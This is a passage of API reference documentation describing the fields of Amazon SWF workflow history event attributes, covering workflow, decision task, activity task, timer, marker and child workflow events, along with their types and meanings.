The source workflow execution that started this workflow execution. The member isn't set if the workflow execution was not started by a workflow.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **parentInitiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **lambdaRole** *(string) --*
The IAM role attached to the workflow execution.
- **workflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The result produced by the workflow execution upon successful completion.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **completeWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CompleteWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The descriptive reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **failWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``FailWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that caused this event.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **workflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
The details of the cancellation.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CancelWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionContinuedAsNewEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionContinuedAsNew`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the new workflow execution.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **newExecutionRunId** *(string) --*
The ``runId`` of the new workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The total duration allowed for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The task list to use for the decisions of the new (continued) workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the task to use for the decisions of the new (continued) workflow execution.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions of the new execution if it is terminated by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **tagList** *(list) --*
The list of tags associated with the new workflow execution.
- *(string) --*
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **lambdaRole** *(string) --*
The IAM role to attach to the new (continued) workflow execution.
- **continueAsNewWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ContinueAsNewWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the termination.
- **details** *(string) --*
The details provided for the termination.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **cause** *(string) --*
If set, indicates that the workflow execution was automatically terminated, and specifies the cause. This happens if the parent workflow execution times out or is terminated and the child policy is set to terminate child executions.
- **workflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **externalWorkflowExecution** *(dict) --*
The external workflow execution for which the cancellation was requested.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this workflow execution.The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cause** *(string) --*
If set, indicates that the request to cancel the workflow execution was automatically generated, and specifies the cause. This happens if the parent workflow execution times out or is terminated, and the child policy is set to cancel child executions.
- **decisionTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **taskList** *(dict) --*
The name of the task list in which the decision task was scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
A task priority that, if set, specifies the priority for this decision task. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **startToCloseTimeout** *(string) --*
The maximum duration for this decision task. The task is considered timed out if it doesn't completed within this duration.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **decisionTaskStartedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the decider making the request. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **executionContext** *(string) --*
User defined context for the workflow execution.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that expired before the decision task could be completed.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The type of the activity task.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique with in a domain.
- **activityId** *(string) --*
The unique ID of the activity task.
- **input** *(string) --*
The input provided to the activity task.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks. This data isn't sent to the activity.
- **scheduleToStartTimeout** *(string) --*
The maximum amount of time the activity task can wait to be assigned to a worker.
- **scheduleToCloseTimeout** *(string) --*
The maximum amount of time for this activity task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker may take to process the activity task.
- **taskList** *(dict) --*
The task list in which the activity task has been scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority to assign to the scheduled activity task. If set, this overrides any default priority value that was assigned when the activity type was registered.
Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **heartbeatTimeout** *(string) --*
The maximum time before which the worker processing this task must report progress by calling RecordActivityTaskHeartbeat . If the timeout is exceeded, the activity task is automatically timed out. If the worker subsequently attempts to record a heartbeat or return a result, it is ignored.
- **activityTaskStartedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the worker that was assigned this task. This aids diagnostics when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The results of the activity task.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **details** *(string) --*
Contains the content of the ``details`` parameter for the last call made by the activity to ``RecordActivityTaskHeartbeat`` .
- **activityTaskCanceledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
Details of the cancellation.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **latestCancelRequestedEventId** *(integer) --*
If set, contains the ID of the last ``ActivityTaskCancelRequested`` event recorded for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskcancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityId** *(string) --*
The unique ID of the task.
- **workflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **signalName** *(string) --*
The name of the signal received. The decider can use the signal name and inputs to determine how to the process the signal.
- **input** *(string) --*
The inputs provided with the signal. The decider can use the signal name and inputs to determine how to process the signal.
- **externalWorkflowExecution** *(dict) --*
The workflow execution that sent the signal. This is set only of the signal was sent by another workflow execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflow`` decision to signal this workflow execution.The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event. This field is set only if the signal was initiated by another workflow execution.
- **markerRecordedEventAttributes** *(dict) --*
If the event is of type ``MarkerRecorded`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The name of the marker.
- **details** *(string) --*
The details of the marker.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that requested this marker. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **recordMarkerFailedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The marker's name.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarkerFailed`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerStartedEventAttributes** *(dict) --*
If the event is of type ``TimerStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was started.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **startToFireTimeout** *(string) --*
The duration of time after which the timer fires.
The duration is specified in seconds, an integer greater than or equal to ``0`` .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerFiredEventAttributes** *(dict) --*
If the event is of type ``TimerFired`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that fired.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerCanceledEventAttributes** *(dict) --*
If the event is of type ``TimerCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was canceled.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks. This data isn't sent to the activity.
- **input** *(string) --*
The inputs provided to the child workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for the child workflow execution. If the workflow execution isn't closed within this duration, it is timed out and force-terminated.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The name of the task list used for the decision tasks of the child workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority assigned for the decision tasks for this workflow execution. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the cause of events.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this execution gets terminated by explicitly calling the TerminateWorkflowExecution action or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration allowed for the decision tasks for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **tagList** *(list) --*
The list of tags to associated with the child workflow execution.
- *(string) --*
- **lambdaRole** *(string) --*
The IAM role to attach to the child workflow execution.
- **childWorkflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was started.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was completed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **result** *(string) --*
The result of the child workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that failed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **reason** *(string) --*
The reason for the failure (if provided).
- **details** *(string) --*
The details of the failure (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that timed out.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **timeoutType** *(string) --*
The type of the timeout that caused the child workflow execution to time out.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was canceled.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **details** *(string) --*
Details of the cancellation (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was terminated.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to send the signal to.
- **signalName** *(string) --*
The name of the signal.
- **input** *(string) --*
The input provided to the signal.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks.
- **externalWorkflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution that the signal was delivered to.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
